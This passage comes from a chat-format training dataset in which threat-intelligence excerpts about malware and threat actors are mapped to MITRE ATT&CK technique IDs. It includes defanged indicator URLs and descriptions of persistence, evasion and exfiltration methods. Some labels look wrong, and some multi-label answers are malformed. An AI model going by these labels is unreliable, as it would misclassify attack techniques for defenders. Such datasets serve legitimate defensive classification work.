- "content": "When referring to additional plugins, it is worth noting that in early versions of Valak the plugins were downloaded by the second stage JS via PowerShell. More recent versions of Valak abandoned the popular yet easily detectable PowerShell downloader approach and transitioned to PluginHost as a means of managing and downloading additional payloads. This transition indicates that the Valak authors are looking for stealthier approaches and ways to improve their evasion techniques"
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Patchwork ran a reverse shell with Meterpreter. Patchwork used JavaScript code and .SCT files on victim machines."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TajMahal can set the \"KeepPrintedJobs\" attribute for configured printers in \"SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Print\\\\Printers\" to enable document stealing."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After that, stage 2 payloads are still retrieved as Bitmap (BMP) images that use Least Significant Bit (LSB) Steganography to hide the real payloads. These images appear normal in image viewers"
- },
- {
- "role": "assistant",
- "content": "T1001.002 - Data Obfuscation via Steganography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Table 3: FELIXROOT backdoor parameters Cryptography All data is transferred to C2 servers using AES encryption and the IbindCtx COM interface using HTTP or HTTPS protocol"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "service-based DLL implant traverses the FTP server’s directories looking for files with keyword matches for computer names or certain keywords."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT28 has used IMAP, POP3, and SMTP for a communication channel in various implants, including using self-registered Google Mail accounts and later compromised email servers of its victims."
- },
- {
- "role": "assistant",
- "content": "T1071.003 - Mail Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chinese state-sponsored cyber actors have been observed exploiting Pulse Secure VPN appliances to view and extract valid user credentials and network information from the servers."
- },
- {
- "role": "assistant",
- "content": "T1212 - Exploitation for Credential Access"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "’s installer is obfuscated with a custom crypter to obfuscate the installer."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "sends information to its hard-coded C2, including OS version, service pack information, processor speed, system name, and OS install date."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It’s located on the hard drive and contains code that can display current volume shadow copy backups and all installed shadow copy writers and providers. Responsible for wiping deleted data from all drives using cipher.exe (cipher.exe is a built-in command-line tool in the Windows operating system that can be used to display or alter the encryption of directories and files on NTFS volumes. It’s located on the hard drive and contains code that can display current volume shadow copy backups and all installed shadow copy writers and providers. 9) Responsible for wiping deleted data from all drives using cipher.exe (cipher.exe is a built-in command-line tool in the Windows operating system that can be used to display or alter the encryption of directories and files on NTFS volumes"
- },
- {
- "role": "assistant",
- "content": "T1490 - Inhibit System Recovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KONNI is heavily obfuscated and includes encrypted configuration files."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can establish persistence by setting the value “Shell” with “explorer.exe, %malware_pathfile%” under the Registry key HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon."
- },
- {
- "role": "assistant",
- "content": "T1547.004 - Boot or Logon Autostart Execution: Winlogon Helper DLL"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MURKYTOP has the capability to identify remote hosts on connected networks."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ursnif has used Tor for C2."
- },
- {
- "role": "assistant",
- "content": "T1090.003 - Proxy: Multi-hop Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Dust Storm, the threat actors sent spearphishing emails that contained a malicious Microsoft Word document."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 obtained Ticket Granting Service (TGS) tickets for Active Directory Service Principle Names to crack offline."
- },
- {
- "role": "assistant",
- "content": "T1558.003 - Steal or Forge Kerberos Tickets: Kerberoasting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OopsIE uses WMI to perform discovery techniques."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "installation file is an unsigned DMG image under the guise of Intego’s security solution for mac."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As mentioned, the registry key (HKLM\\SOFTWARE\\Microsoft\\DRM) is where the malicious payload is stored. In this case, this is the Pillowmint Trojan. Pillowmint is stored and compressed in the registry key"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShadowPad has used FTP for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.002 - File Transfer Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Helminth establishes persistence by creating a shortcut."
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "hxxp://www.sanjosemaristas[.]com/app/index.php?{A01BA0AD-9BB3-4F38-B76B-A00AD11CBAAA}, providing the current network adapter’s service name GUID"
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StreamEx has the ability to enumerate drive types."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Squirrelwaffle has been distributed via malicious Microsoft Office documents within spam emails."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Data field is encrypted using a custom stream cipher."
- },
- {
- "role": "assistant",
- "content": "T1486 - Data Encrypted for Impact"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After “GetExtendedTcpTable” is executed and the process returns back to the second part of the code, it iteratively checks every record in the returned Tcp table. If any record contains the PID Waterbear wants to hide, it will remove the corresponding record, modify the record number inside the table, and continue to check the succeeding records"
- },
- {
- "role": "assistant",
- "content": "T1562.006 - Impair Defenses: Indicator Blocking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The OilRig group remains highly active in their attack campaigns while they continue to evolve their toolset. On January 8, 2018, Unit 42 observed the OilRig threat group carry out an attack on an insurance agency based in the Middle East. The January 8 attack used a variant of the ThreeDollars delivery document, which we identified as part of the OilRig toolset based on attacks that occurred in August 2017. Instead, this attack involved delivering the OopsIE Trojan directly to the victim, most likely using a link in a spear phishing email. Interestingly, the targeted organization in the January 16 attack had already been targeted by the OilRig group a year ago on January 2017. A New Attack On January 8, 2018, the OilRig threat group sent an email with the subject Beirut Insurance Seminar Invitation to an insurance agency in the Middle East. The OilRig group sent two emails to two different email addresses at the same organization within a six minutes time span. The email contained an attachment named Seminar-Invitation.doc, which is a malicious Microsoft Word document we track as ThreeDollars. In this case, the ThreeDollars delivery document was not used and instead an attempt was made to deliver the OopsIE Trojan directly to the targeted organization, likely via a link within an email. As we have observed throughout our tracking of the OilRig group, adopting proven tactics has been a common behavior over time"
- },
- {
- "role": "assistant",
- "content": "T1566.002 - Phishing: Spearphishing Link"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In early 2015, a new Emotet modification was released, not all that different from the previous one. Among the changes were: new built-in public RSA key, most strings encrypted, ATS scripts for web injection cleared of comments, targets included clients of Swiss banks."
- },
- {
- "role": "assistant",
- "content": "T1592.004 - Client Configurations"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "opens a backdoor on TCP ports 6868 and 7777."
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "sent spearphishing emails containing malicious Microsoft Office attachments."
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWERSTATS has connected to C2 servers through proxies."
- },
- {
- "role": "assistant",
- "content": "T1090.002 - External Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The OsInfo function in collects the current running username."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Anchor can create and execute services to load its payload."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FunnyDream can identify files with .doc, .docx, .ppt, .pptx, .xls, .xlsx, and .pdf extensions and specific timestamps for collection."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "H1N1 has added a plethora of new functionality in comparison to earlier reports. Throughout this blog series we will be analyzing the capabilities of H1N1 including: obfuscation, a User Account Control (UAC) bypass, information stealing, data exfiltration, loader/dropper, and self-propagation/lateral movement techniques used by this variant.1,2"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "cmd is used to execute programs and other actions at the command-line interface."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 has used JavaScript for drive-by downloads and C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The paths discovered are: • C:\\Users\\leo\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd • C:\\Users\\poopak\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd • C:\\Users\\Vendetta\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd • C:\\Users\\Turk\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd Leo, Poopak, Vendetta and Turk are the usernames of those creating the documents or the templates on which they are based"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery', 'T1005 - Data from Local System', 'T1087 - Account Discovery', 'T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ROKRAT can steal credentials by leveraging the Windows Vault mechanism."
- },
- {
- "role": "assistant",
- "content": "T1555.004 - Credentials from Password Stores: Windows Credential Manager"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PingPull can mimic the names and descriptions of legitimate services such as `iphlpsvc`, `IP Helper`, and `Onedrive` to evade detection."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor initially conducts system reconnaissance to assess the AV software installed and the user privilege"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If the user clicks on the link, he will be prompted to download a RAR file that contains the stage 1 malware/lure, which he will execute afterwards"
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Additional tools were recovered during the incident, including a network scanning/enumeration tool, the archiving tool WinRAR and a bespoke Microsoft SharePoint enumeration and data dumping tool, known as ‘spwebmember"
- },
- {
- "role": "assistant",
- "content": "T1213.002 - Sharepoint', 'T1018 - Remote System Discovery', 'T1213.002 - Sharepoint"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32's macOS backdoor hides the clientID file via a chflags function."
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbanak lists running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Night Dragon, threat actors used zwShell to establish full remote control of the connected machine and run command-line shells."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PROMETHIUM has named services to appear legitimate."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If so, it stops the execution and deletes the folder containing the malicious script from this machine. Download the malicious files onto the machine: the same batch file downloads a cab archive named env.cab from a remote address in the internal network: \\\\railways.ir\\sysvol\\railways.ir\\scripts\\env.cab. The use of specific hostnames and internal paths indicates the attacker had prior knowledge of the environment. It moves wiper-related files to “C:\\temp” and creates a scheduled task named mstask to execute the wiper only once at 23:55:00"
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This process executes a command to maliciously use the legitimate wmic.exe to initialize an XSL Script Processing (MITRE Technique T1220) attack. The attack executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain (qnccmvbrh.wilstonbrwsaq[.]pw"
- },
- {
- "role": "assistant",
- "content": "T1220 - XSL Script Processing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used PowerShell for execution of a payload."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SLOTHFULMEDIA has downloaded files onto a victim machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sandworm Team has exfiltrated internal documents, files, and other data from compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has delivered and by executing PowerShell commands through DDE in Word documents."
- },
- {
- "role": "assistant",
- "content": "T1559.002 - Inter-Process Communication: Dynamic Data Exchange"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Smoke Loader searches through Outlook files and directories (e.g., inbox, sent, templates, drafts, archives, etc.)."
- },
- {
- "role": "assistant",
- "content": "T1114.001 - Email Collection: Local Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Drovorub can use the WebSocket protocol and has initiated communication with C2 servers with an HTTP Upgrade request."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OnionDuke uses Twitter as a backup C2."
- },
- {
- "role": "assistant",
- "content": "T1102.003 - One-Way Communication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "For FunnyDream, the threat actors likely established an identified email account to register a variety of domains that were used during the campaign."
- },
- {
- "role": "assistant",
- "content": "T1585.002 - Email Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MoleNet can download additional payloads from the C2."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Introduced in macOS 10.11, this utility has only one publicly documented use, which is to return the status of the System Integrity Protection tool. The csrutil tool is commonly used by malware and post-exploitation tools to determine whether certain files and directories on the system are writable or not"
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sakula calls cmd.exe to run various DLL files via rundll32."
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "JAVASCRIPT CODE SNIPPETS: The first stage JavaScript copies additional JavaScript code snippets in txt format from the RTF document into a random directory “C:\\Users\\\\\\”"
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery', 'T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a batch file that modifies Registry keys to launch a DLL into the svchost.exe process."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWRUNER may also receive batch commands from the C2 server to collect host information from the system"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery', 'T1057 - Process Discovery', 'T1047 - Windows Management Instrumentation', 'T1049 - System Network Connections Discovery', 'T1016 - System Network Configuration Discovery', 'T1082 - System Information Discovery', 'T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "It also allows macro code to access internal VBA objects for stealthier macro code execution in future attacks"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Commands such as net view can be used in to gather information about available remote systems."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attackers used the Windows Management Instrumentation Command Line Utility (wmic.exe) to execute commands on remote computers, such as adding a new user or executing additional downloaded PowerShell scripts. Cobalt Strike was also used to carry out credential dumping using ProcDump and to empty log files"
- },
- {
- "role": "assistant",
- "content": "T1136 - Create Account', 'T1047 - Windows Management Instrumentation', 'T1070.001 - Indicator Removal on Host: Clear Windows Event Logs', 'T1003.001 - OS Credential Dumping: LSASS Memory"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole uses a variation of the XOR cipher to encrypt files before exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560.003 - Archive via Custom Method"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Qakbot has anti-analysis and anti-virtual machine checks. It will not continue to execute if any of the following exists in the system"
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
